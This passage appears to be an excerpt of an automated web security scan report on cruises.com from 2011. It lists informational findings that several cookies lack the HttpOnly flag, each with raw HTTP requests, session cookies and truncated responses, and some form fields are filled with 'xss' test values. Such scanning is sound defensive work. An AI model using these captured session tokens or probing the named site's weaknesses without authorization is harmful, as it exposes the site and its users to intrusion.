Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; sid=6383; JSESSIONID=12B50B9A092975EDA676566C18A72E04; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.9.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:40 GMT
Server: Apache
Set-Cookie: WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; Expires=Thu, 30-Sep-2021 12:42:41 GMT; Path=/
Set-Cookie: IncludeAlumniRates=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: IncludeSeniorRates=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AlumniCruiseId=false; Expires=Wed, 02-Nov-2011 12:42:41 GMT; Path=/
Set-Cookie: shoppingZipCode="Zip Code"; Expires=Wed, 02-Nov-2011 12:42:41 GMT; Path=/
Set-Cookie: EmailSignupComplete=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AFF%5FCID=%22%22; Expires=Wed, 02-Nov-2011 12:42:41 GMT; Path=/
Set-Cookie: sid=6383; Path=/
Content-Type: text/html
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:44:41 GMT;path=/
Cache-Control: private
Content-Length: 37720


<script language="JavaScript">
var CruiseALLArray = new Array("('All Ships ','ALL',true,true)");
var Cruise325Array = new Array("('All Ships ','ALL',true,true)",
"('Azamara Journey
...[SNIP]...
12.36. http://www.cruises.com/ajaxjson/filterdynamic.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /ajaxjson/filterdynamic.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajaxjson/filterdynamic.do?wdos=3&d=&d2=&porttype=E&SType=P&ptype=c&type=c&shoppingZipCode=Zip+Code&SType=A&clp=1&sort=7&changedDdl=undefined HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/json; charset=utf-8
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.cruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; __utmx=229343950.; __utmxx=229343950.; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.3.9.1317645663627; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:40:45 GMT
Server: Apache
Content-Length: 6721
Content-Type: application/json;charset=UTF-8
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:42:45 GMT;path=/


{"months":[{"key":"ALL","value":"Any"},{"key":"10/1/2011","value":"October 2011"},{"key":"11/1/2011","value":"November 2011"},{"key":"12/1/2011","value":"December 2011"},{"key":"1/1/2012",
...[SNIP]...
12.37. http://www.cruises.com/cs/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /cs/default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cs/default.asp HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/promotion/balcony-suite-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.7.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 65631
Content-Type: text/html
Set-Cookie: AFF%5FCID=%22%22; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private
Content-Length: 65631


<script language="JavaScript">


    function CallUrchin(event_name)
{
       
           pageTracker._trackPageview(event_name);
           //alert(event_name);
       
       return true;
}
...[SNIP]...
12.38. http://www.cruises.com/i/shadow.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /i/shadow.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/shadow.png HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/results.do?searchOrigin=refine&places=ALL&days=ALL&Month=ALL&dd=ALL&d=&d2=&fd=2&c=ALL&v=ALL&p=ALL&shoppingZipCode=10010&IncludeSeniorRates=true&IncludeAlumniRates=true&AlumniCruiseId=44&sort_by=7&Search.x=28&Search.y=17&Search=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; JSESSIONID=12B50B9A092975EDA676566C18A72E04; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; IncludeAlumniRates=true; IncludeSeniorRates=true; AlumniCruiseId=44; shoppingZipCode=10010; AFF%5FCID=%22%22; sid=6383; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.16.8.1317645879081; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 404 file not found
Date: Mon, 03 Oct 2011 12:44:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 31431
Content-Type: text/html
Set-Cookie: AFF%5FCID=%22%22; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private
Content-Length: 31431


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
   <head>
        <title>Page unavailable</title>
       
               <meta name="ROBOTS" content="ALL,NOODP" />
               <meta name="GOOG
...[SNIP]...
12.39. http://www.cruises.com/idle.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /idle.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /idle.do?msg=2 HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cruises.com/results.do?searchOrigin=refine&places=ALL&days=ALL&Month=ALL&dd=ALL&d=&d2=&fd=2&c=ALL&v=ALL&p=ALL&shoppingZipCode=10010&IncludeSeniorRates=true&IncludeAlumniRates=true&AlumniCruiseId=44&sort_by=7&Search.x=28&Search.y=17&Search=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; JSESSIONID=12B50B9A092975EDA676566C18A72E04; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.18.9.1317645980928; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; IncludeAlumniRates=true; IncludeSeniorRates=true; AlumniCruiseId=44; shoppingZipCode=10010; EmailSignupComplete=Yes; AFF%5FCID=%22%22; sid=6383; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d0e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:46:03 GMT
Server: Apache
Set-Cookie: WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; Expires=Thu, 30-Sep-2021 12:46:03 GMT; Path=/
Set-Cookie: IncludeAlumniRates=true; Expires=Wed, 02-Nov-2011 12:46:03 GMT; Path=/
Set-Cookie: IncludeSeniorRates=true; Expires=Wed, 02-Nov-2011 12:46:03 GMT; Path=/
Set-Cookie: AlumniCruiseId=44; Expires=Wed, 02-Nov-2011 12:46:03 GMT; Path=/
Set-Cookie: shoppingZipCode=10010; Expires=Wed, 02-Nov-2011 12:46:03 GMT; Path=/
Set-Cookie: EmailSignupComplete=Yes; Expires=Tue, 02-Oct-2012 12:46:03 GMT; Path=/
Set-Cookie: AFF%5FCID=%22%22; Expires=Wed, 02-Nov-2011 12:46:03 GMT; Path=/
Set-Cookie: sid=6383; Path=/
ntCoent-Length: 45
Content-Type: text/html
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d0e45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:48:03 GMT;path=/
Cache-Control: private
Content-Length: 45


<!--
   This is an idle action ! />
-->
12.40. http://www.cruises.com/mailing.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /mailing.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /mailing.do HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
Content-Length: 111
Origin: http://www.cruises.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.cruises.com/results.do?searchOrigin=refine&places=ALL&days=ALL&Month=ALL&dd=ALL&d=&d2=&fd=2&c=ALL&v=ALL&p=ALL&shoppingZipCode=10010&IncludeSeniorRates=true&IncludeAlumniRates=true&AlumniCruiseId=44&sort_by=7&Search.x=28&Search.y=17&Search=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; JSESSIONID=12B50B9A092975EDA676566C18A72E04; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; IncludeAlumniRates=true; IncludeSeniorRates=true; AlumniCruiseId=44; shoppingZipCode=10010; sid=6383; AFF%5FCID=%22%22; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.18.9.1317645980928; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

redirect=idle.do&sfids%5B1%5D=525&firstname=xss&lastname=xss&email=xss%40cruises.com&sfids%5B3%5D=525&zip=10010

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 12:46:02 GMT
Server: Apache
Set-Cookie: WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; Expires=Thu, 30-Sep-2021 12:46:02 GMT; Path=/
Set-Cookie: IncludeAlumniRates=true; Expires=Wed, 02-Nov-2011 12:46:02 GMT; Path=/
Set-Cookie: IncludeSeniorRates=true; Expires=Wed, 02-Nov-2011 12:46:02 GMT; Path=/
Set-Cookie: AlumniCruiseId=44; Expires=Wed, 02-Nov-2011 12:46:02 GMT; Path=/
Set-Cookie: shoppingZipCode=10010; Expires=Wed, 02-Nov-2011 12:46:02 GMT; Path=/
Set-Cookie: EmailSignupComplete=Yes; Expires=Tue, 02-Oct-2012 12:46:02 GMT; Path=/
Set-Cookie: AFF%5FCID=%22%22; Expires=Wed, 02-Nov-2011 12:46:02 GMT; Path=/
Set-Cookie: sid=6383; Path=/
Location: http://www.cruises.com/idle.do?msg=2
Content-Length: 0
Content-Type: text/plain
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d0e45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:48:02 GMT;path=/

12.41. http://www.cruises.com/promotion/balcony-suite-cruises.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /promotion/balcony-suite-cruises.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotion/balcony-suite-cruises.do HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utmx=229343950.; __utmxx=229343950.; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.6.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:22 GMT
Server: Apache
Content-Length: 366262
Content-Type: text/html
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:43:22 GMT;path=/


<script language='JavaScript' src='/lib/javascript/ajax/jquery/jquery-1.6.3.min.js'></script>
<script language="javascript" src="/Code/javascript/ajax/jquery/jquery.form.js" type="text/java
...[SNIP]...
12.42. http://www.cruises.com/promotion/weekend-cruises.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /promotion/weekend-cruises.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotion/weekend-cruises.do HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.8.9.1317645699652; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:36 GMT
Server: Apache
Content-Length: 129897
Content-Type: text/html
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:44:36 GMT;path=/


<script language='JavaScript' src='/lib/javascript/ajax/jquery/jquery-1.6.3.min.js'></script>
<script language="javascript" src="/Code/javascript/ajax/jquery/jquery.form.js" type="text/java
...[SNIP]...
12.43. http://www.cruises.com/results.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /results.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results.do?searchOrigin=refine&places=ALL&days=ALL&Month=ALL&dd=ALL&d=&d2=&fd=2&c=ALL&v=ALL&p=ALL&shoppingZipCode=10010&IncludeSeniorRates=true&IncludeAlumniRates=true&AlumniCruiseId=44&sort_by=7&Search.x=28&Search.y=17&Search=Search HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/promotion/weekend-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; JSESSIONID=12B50B9A092975EDA676566C18A72E04; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; AlumniCruiseId=false; shoppingZipCode="Zip Code"; AFF%5FCID=%22%22; sid=6383; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.13.8.1317645863557; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:05 GMT
Server: Apache
Set-Cookie: WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; Expires=Thu, 30-Sep-2021 12:44:06 GMT; Path=/
Set-Cookie: IncludeAlumniRates=true; Expires=Wed, 02-Nov-2011 12:44:06 GMT; Path=/
Set-Cookie: IncludeSeniorRates=true; Expires=Wed, 02-Nov-2011 12:44:06 GMT; Path=/
Set-Cookie: AlumniCruiseId=44; Expires=Wed, 02-Nov-2011 12:44:06 GMT; Path=/
Set-Cookie: shoppingZipCode=10010; Expires=Wed, 02-Nov-2011 12:44:06 GMT; Path=/
Set-Cookie: EmailSignupComplete=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: AFF%5FCID=%22%22; Expires=Wed, 02-Nov-2011 12:44:06 GMT; Path=/
Set-Cookie: sid=6383; Path=/
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d2c45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:46:06 GMT;path=/
Cache-Control: private
Content-Length: 177692


<html>
<head profile="http://www.w3.org/2005/10/profile">


           <META NAME="Description" CONTENT="Find the best cruise and vacation deals on the Internet, make cruise and hote
...[SNIP]...
12.44. http://www.cruises.com/sc.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /sc.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sc.do?d=10/03/2011&d2=04/02/2014&i=852431&c=1&v=46&IncludeAlumniRates=true&IncludeSeniorRates=true&zipcode=10010&statecode=&dsc=y HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/results.do?searchOrigin=refine&places=ALL&days=ALL&Month=ALL&dd=ALL&d=&d2=&fd=2&c=ALL&v=ALL&p=ALL&shoppingZipCode=10010&IncludeSeniorRates=true&IncludeAlumniRates=true&AlumniCruiseId=44&sort_by=7&Search.x=28&Search.y=17&Search=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WTHGeoLocation=CountryCode=US; WDVID=%7BFFB49BDE%2DB2EE%2D4D7A%2DB652%2DA6AA2F06AB63%7D; ASPSESSIONIDAQASDRCS=PFGAFPMACOENMMLEIOFADKLB; NSC_WJQ-DSVJTFT.DPN=ffffffff095b1c9c45525d5f4f58455e445a4a423662; _msuuid_7871bv11074=7200E557-607F-4F1A-82DB-75086671DFA2; __utmx=229343950.; __utmxx=229343950.; __utma=229343950.1971735135.1317645653.1317645653.1317645653.1; __utmb=229343950.18.9.1317645980928; __utmc=229343950; __utmz=229343950.1317645653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=229343950.|1=SearchWidget=Dynamic=1; WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; IncludeAlumniRates=true; IncludeSeniorRates=true; AlumniCruiseId=44; shoppingZipCode=10010; EmailSignupComplete=Yes; AFF%5FCID=%22%22; sid=6383; JSESSIONID=6FC45782F4EC10BBA7768E419D7F36EA; NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d0e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:46:11 GMT
Server: Apache
Set-Cookie: WDUID=%7BF6D9B130%2D78E7%2D4EA3%2D906E%2D3EB09D4F7BEE%7D; Expires=Thu, 30-Sep-2021 12:46:12 GMT; Path=/
Set-Cookie: IncludeAlumniRates=true; Expires=Wed, 02-Nov-2011 12:46:12 GMT; Path=/
Set-Cookie: IncludeSeniorRates=true; Expires=Wed, 02-Nov-2011 12:46:12 GMT; Path=/
Set-Cookie: AlumniCruiseId=44; Expires=Wed, 02-Nov-2011 12:46:12 GMT; Path=/
Set-Cookie: shoppingZipCode=10010; Expires=Wed, 02-Nov-2011 12:46:12 GMT; Path=/
Set-Cookie: EmailSignupComplete=Yes; Expires=Tue, 02-Oct-2012 12:46:12 GMT; Path=/
Set-Cookie: AFF%5FCID=%22%22; Expires=Wed, 02-Nov-2011 12:46:12 GMT; Path=/
Set-Cookie: sid=6383; Path=/
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: NSC_WJQ-BQDI-DSVJTFT.DPN=ffffffff095b1d0e45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 12:48:12 GMT;path=/
Cache-Control: private
Content-Length: 479627


<html>
<head profile="http://www.w3.org/2005/10/profile">


           <META NAME="Description" CONTENT="Find the best cruise and vacation deals on the Internet, make cruise and hote
...[SNIP]...
12.45. http://www.cruises.com/vistracker.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cruises.com
Path:   /vistracker.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /vistracker.do?server=blweb23%20&zip=10010&email=xss@cruises.com&ln=xss&fn=xss&store=CDCNW&pg=results.do&wduid={F6D9B130-78E7-4EA3-906E-3EB09D4F7BEE}&wdvid={FFB49BDE-B2EE-4D7A-B652-A6AA2F06AB63}&sr=true&sailid=null&apc=null&cpc=null&contact=1&alumni=true&alumnicruiseids=44 HTTP/1.1
Host: www.cruises.com
Proxy-Connection: keep-alive
